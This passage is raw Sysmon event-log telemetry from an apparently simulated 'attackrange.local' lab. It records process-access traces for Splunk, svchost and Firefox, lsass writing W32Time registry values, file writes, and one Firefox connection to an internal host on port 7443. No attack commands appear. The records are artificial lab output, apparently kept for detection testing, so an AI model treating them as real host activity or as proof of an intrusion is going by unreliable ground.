AUTHORITY\SYSTEM{39BD8DE3-0F64-60CA-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{39BD8DE3-480D-60CA-F607-00000000D101}5112C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000151326Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:05.459{39BD8DE3-711D-60CA-1C0D-00000000D101}65125908C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{39BD8DE3-480D-60CA-F607-00000000D101}5112C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151325Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:05.196{39BD8DE3-131D-60CA-0B01-00000000D101}11926820C:\Program Files\Mozilla Firefox\firefox.exe{39BD8DE3-131F-60CA-0D01-00000000D101}2148C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+2cf80|C:\Program Files\Mozilla Firefox\firefox.exe+2cad3|C:\Program Files\Mozilla Firefox\firefox.exe+40de0|C:\Program Files\Mozilla Firefox\firefox.exe+40adc|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151324Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:05.196{39BD8DE3-480E-60CA-FA07-00000000D101}71324084C:\Windows\system32\conhost.exe{39BD8DE3-711D-60CA-1C0D-00000000D101}6512C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151323Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:05.196{39BD8DE3-0F64-60CA-0C00-00000000D101}7201900C:\Windows\system32\svchost.exe{39BD8DE3-0F65-60CA-1B00-00000000D101}1972C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151322Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:05.196{39BD8DE3-0F64-60CA-0C00-00000000D101}7201900C:\Windows\system32\svchost.exe{39BD8DE3-0F65-60CA-1B00-00000000D101}1972C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151321Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:05.196{39BD8DE3-0F64-60CA-0C00-00000000D101}7201900C:\Windows\system32\svchost.exe{39BD8DE3-0F65-60CA-1B00-00000000D101}1972C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151320Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:05.196{39BD8DE3-0F63-60CA-0500-00000000D101}408424C:\Windows\system32\csrss.exe{39BD8DE3-711D-60CA-1C0D-00000000D101}6512C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000151319Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:05.196{39BD8DE3-0F64-60CA-0C00-00000000D101}7201900C:\Windows\system32\svchost.exe{39BD8DE3-0F65-60CA-1B00-00000000D101}1972C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151318Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:05.195{39BD8DE3-480D-60CA-F607-00000000D101}51125172C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{39BD8DE3-711D-60CA-1C0D-00000000D101}6512C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000151317Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:05.193{39BD8DE3-711D-60CA-1C0D-00000000D101}6512C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{39BD8DE3-0F64-60CA-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{39BD8DE3-480D-60CA-F607-00000000D101}5112C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000151316Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:05.143{39BD8DE3-131D-60CA-0B01-00000000D101}11926820C:\Program Files\Mozilla Firefox\firefox.exe{39BD8DE3-131F-60CA-0D01-00000000D101}2148C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+2cf80|C:\Program Files\Mozilla Firefox\firefox.exe+2cad3|C:\Program Files\Mozilla Firefox\firefox.exe+40de0|C:\Program Files\Mozilla Firefox\firefox.exe+40adc|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151315Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:05.111{39BD8DE3-131D-60CA-0B01-00000000D101}11926820C:\Program Files\Mozilla Firefox\firefox.exe{39BD8DE3-131F-60CA-0D01-00000000D101}2148C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+2cf80|C:\Program Files\Mozilla Firefox\firefox.exe+2cad3|C:\Program Files\Mozilla Firefox\firefox.exe+40de0|C:\Program Files\Mozilla Firefox\firefox.exe+40adc|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151314Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:05.111{39BD8DE3-131D-60CA-0B01-00000000D101}11926820C:\Program Files\Mozilla Firefox\firefox.exe{39BD8DE3-131F-60CA-0D01-00000000D101}2148C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+2cf80|C:\Program Files\Mozilla Firefox\firefox.exe+2cad3|C:\Program Files\Mozilla Firefox\firefox.exe+40de0|C:\Program Files\Mozilla Firefox\firefox.exe+40adc|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151313Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:05.111{39BD8DE3-131D-60CA-0B01-00000000D101}11926820C:\Program Files\Mozilla Firefox\firefox.exe{39BD8DE3-131F-60CA-0D01-00000000D101}2148C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+2cf80|C:\Program Files\Mozilla Firefox\firefox.exe+2cad3|C:\Program Files\Mozilla Firefox\firefox.exe+40de0|C:\Program Files\Mozilla Firefox\firefox.exe+40adc|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151312Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:05.096{39BD8DE3-131D-60CA-0B01-00000000D101}11926820C:\Program Files\Mozilla Firefox\firefox.exe{39BD8DE3-131F-60CA-0D01-00000000D101}2148C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+2cf80|C:\Program Files\Mozilla Firefox\firefox.exe+2cad3|C:\Program Files\Mozilla Firefox\firefox.exe+40de0|C:\Program Files\Mozilla Firefox\firefox.exe+40adc|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151311Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:05.096{39BD8DE3-131D-60CA-0B01-00000000D101}11926820C:\Program Files\Mozilla Firefox\firefox.exe{39BD8DE3-131F-60CA-0D01-00000000D101}2148C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+2cf80|C:\Program Files\Mozilla Firefox\firefox.exe+2cad3|C:\Program Files\Mozilla Firefox\firefox.exe+40de0|C:\Program Files\Mozilla Firefox\firefox.exe+40adc|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151310Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:05.096{39BD8DE3-131D-60CA-0B01-00000000D101}11926820C:\Program Files\Mozilla Firefox\firefox.exe{39BD8DE3-131F-60CA-0D01-00000000D101}2148C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+2cf80|C:\Program Files\Mozilla Firefox\firefox.exe+2cad3|C:\Program Files\Mozilla Firefox\firefox.exe+40de0|C:\Program Files\Mozilla Firefox\firefox.exe+40adc|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151309Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:05.096{39BD8DE3-131D-60CA-0B01-00000000D101}11921152C:\Program Files\Mozilla Firefox\firefox.exe{39BD8DE3-144D-60CA-3801-00000000D101}2868C:\Program Files\Mozilla Firefox\firefox.exe0x2200C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+51b80|C:\Program Files\Mozilla Firefox\xul.dll+29f5e8d|C:\Program Files\Mozilla Firefox\xul.dll+29f5b59|C:\Program Files\Mozilla Firefox\xul.dll+29f0d9f|C:\Program Files\Mozilla Firefox\xul.dll+29bcc11|C:\Program Files\Mozilla Firefox\xul.dll+4e69592|C:\Program Files\Mozilla Firefox\xul.dll+14af161|C:\Program Files\Mozilla Firefox\xul.dll+14b1aac|C:\Program Files\Mozilla Firefox\xul.dll+103a13|C:\Program Files\Mozilla Firefox\xul.dll+3c2b8b7|C:\Program Files\Mozilla Firefox\xul.dll+fcdc2|C:\Program Files\Mozilla Firefox\xul.dll+3b15871|C:\Program Files\Mozilla Firefox\xul.dll+103e8a|C:\Program Files\Mozilla Firefox\xul.dll+3c2b8b7|C:\Program Files\Mozilla Firefox\xul.dll+fcdc2|C:\Program Files\Mozilla Firefox\xul.dll+3b15871|C:\Program Files\Mozilla Firefox\xul.dll+103e8a|C:\Program Files\Mozilla Firefox\xul.dll+178d52|UNKNOWN(000003D4EAE53DFF) 13241300x8000000000000000104900Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-SetValue2021-06-16 21:46:06.913{54715871-FD16-60C9-0B00-00000000CF01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000006) 13241300x8000000000000000104899Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-SetValue2021-06-16 21:46:06.913{54715871-FD16-60C9-0B00-00000000CF01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x01c54c30) 13241300x8000000000000000104898Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-SetValue2021-06-16 21:46:06.913{54715871-FD16-60C9-0B00-00000000CF01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d762f0-0xa0dc5647) 13241300x8000000000000000104897Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-SetValue2021-06-16 21:46:06.913{54715871-FD16-60C9-0B00-00000000CF01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d762f9-0x02a0be47) 13241300x8000000000000000104896Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-SetValue2021-06-16 21:46:06.913{54715871-FD16-60C9-0B00-00000000CF01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d76301-0x64652647) 13241300x8000000000000000104895Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-SetValue2021-06-16 21:46:06.913{54715871-FD16-60C9-0B00-00000000CF01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000006) 13241300x8000000000000000104894Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-SetValue2021-06-16 21:46:06.913{54715871-FD16-60C9-0B00-00000000CF01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x01c54c30) 13241300x8000000000000000104893Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-SetValue2021-06-16 21:46:06.913{54715871-FD16-60C9-0B00-00000000CF01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d762f0-0xa0dc5647) 13241300x8000000000000000104892Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-SetValue2021-06-16 21:46:06.913{54715871-FD16-60C9-0B00-00000000CF01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d762f9-0x02a0be47) 13241300x8000000000000000104891Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-SetValue2021-06-16 21:46:06.913{54715871-FD16-60C9-0B00-00000000CF01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d76301-0x64652647) 23542300x8000000000000000104890Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:46:06.504{54715871-FD18-60C9-1000-00000000CF01}380NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=15E3494FD4BA7114F463C6DD61A3EFCA,SHA256=94764782B7836F1C052ADCF8D93CFBD6B5146D3F4F8A4E38B2E555982AADEE0E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104889Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:46:06.125{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B52BD62E66447F8A0F74C9C7D3E61086,SHA256=976D46C2C101A8FE240460697D3B6DD02C9DE8CEE8841A1CF029C96B39A512BF,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000151348Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:05.502{39BD8DE3-131D-60CA-0B01-00000000D101}1192C:\Program Files\Mozilla Firefox\firefox.exeWIN-HOST-14\Administratortcptruefalse10.0.1.15win-host-14.attackrange.local58395-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal7443- 10341000x8000000000000000151347Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:06.578{39BD8DE3-131D-60CA-0B01-00000000D101}11926820C:\Program Files\Mozilla Firefox\firefox.exe{39BD8DE3-131F-60CA-0D01-00000000D101}2148C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+2cf80|C:\Program Files\Mozilla Firefox\firefox.exe+2cad3|C:\Program Files\Mozilla Firefox\firefox.exe+40de0|C:\Program Files\Mozilla Firefox\firefox.exe+40adc|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151346Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:06.316{39BD8DE3-131D-60CA-0B01-00000000D101}11926820C:\Program Files\Mozilla Firefox\firefox.exe{39BD8DE3-131F-60CA-0D01-00000000D101}2148C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+2cf80|C:\Program Files\Mozilla Firefox\firefox.exe+2cad3|C:\Program Files\Mozilla Firefox\firefox.exe+40de0|C:\Program Files\Mozilla Firefox\firefox.exe+40adc|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151345Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:06.198{39BD8DE3-131D-60CA-0B01-00000000D101}11921152C:\Program Files\Mozilla Firefox\firefox.exe{39BD8DE3-131F-60CA-0D01-00000000D101}2148C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+3ecf51|C:\Program Files\Mozilla Firefox\xul.dll+16a060f|C:\Program Files\Mozilla Firefox\xul.dll+68a670|C:\Program Files\Mozilla Firefox\xul.dll+179b3f2|C:\Program Files\Mozilla Firefox\xul.dll+179b324|C:\Program Files\Mozilla Firefox\xul.dll+6878f8|C:\Program Files\Mozilla Firefox\xul.dll+1797c17|C:\Program Files\Mozilla Firefox\xul.dll+17a1ea8|C:\Program Files\Mozilla Firefox\xul.dll+17a1ea8|C:\Program Files\Mozilla Firefox\xul.dll+17a1ea8|C:\Program Files\Mozilla Firefox\xul.dll+17a1ea8|C:\Program Files\Mozilla Firefox\xul.dll+1795f16|C:\Program Files\Mozilla Firefox\xul.dll+17963f3|C:\Program Files\Mozilla Firefox\xul.dll+2ff7916|C:\Program Files\Mozilla Firefox\xul.dll+64a53d|C:\Program Files\Mozilla Firefox\xul.dll+640992|C:\Program Files\Mozilla Firefox\xul.dll+2bbbae1|C:\Program Files\Mozilla Firefox\xul.dll+2bbad50|C:\Program Files\Mozilla Firefox\xul.dll+61e011|C:\Program Files\Mozilla Firefox\xul.dll+2d7a6fa|C:\Program Files\Mozilla Firefox\xul.dll+2d7f900|C:\Program Files\Mozilla Firefox\xul.dll+2d7f775 10341000x8000000000000000151344Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:06.198{39BD8DE3-131D-60CA-0B01-00000000D101}11921152C:\Program Files\Mozilla Firefox\firefox.exe{39BD8DE3-131F-60CA-0D01-00000000D101}2148C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+3ecf51|C:\Program Files\Mozilla Firefox\xul.dll+1203781|C:\Program Files\Mozilla Firefox\xul.dll+1234ce9|C:\Program Files\Mozilla Firefox\xul.dll+1234c09|C:\Program Files\Mozilla Firefox\xul.dll+12323e0|C:\Program Files\Mozilla Firefox\xul.dll+12328f4|C:\Program Files\Mozilla Firefox\xul.dll+16ba421|C:\Program Files\Mozilla Firefox\xul.dll+689569|C:\Program Files\Mozilla Firefox\xul.dll+689474|C:\Program Files\Mozilla Firefox\xul.dll+68925d|C:\Program Files\Mozilla Firefox\xul.dll+688e64|C:\Program Files\Mozilla Firefox\xul.dll+179b3d3|C:\Program Files\Mozilla Firefox\xul.dll+179b324|C:\Program Files\Mozilla Firefox\xul.dll+6878f8|C:\Program Files\Mozilla Firefox\xul.dll+1797c17|C:\Program Files\Mozilla Firefox\xul.dll+17a1ea8|C:\Program Files\Mozilla Firefox\xul.dll+17a1ea8|C:\Program Files\Mozilla Firefox\xul.dll+17a1ea8|C:\Program Files\Mozilla Firefox\xul.dll+17a1ea8|C:\Program Files\Mozilla Firefox\xul.dll+1795f16|C:\Program Files\Mozilla Firefox\xul.dll+17963f3|C:\Program Files\Mozilla Firefox\xul.dll+2ff7916 10341000x8000000000000000151343Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:06.197{39BD8DE3-131D-60CA-0B01-00000000D101}11926820C:\Program Files\Mozilla Firefox\firefox.exe{39BD8DE3-131F-60CA-0D01-00000000D101}2148C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+2cf80|C:\Program Files\Mozilla Firefox\firefox.exe+2cad3|C:\Program Files\Mozilla 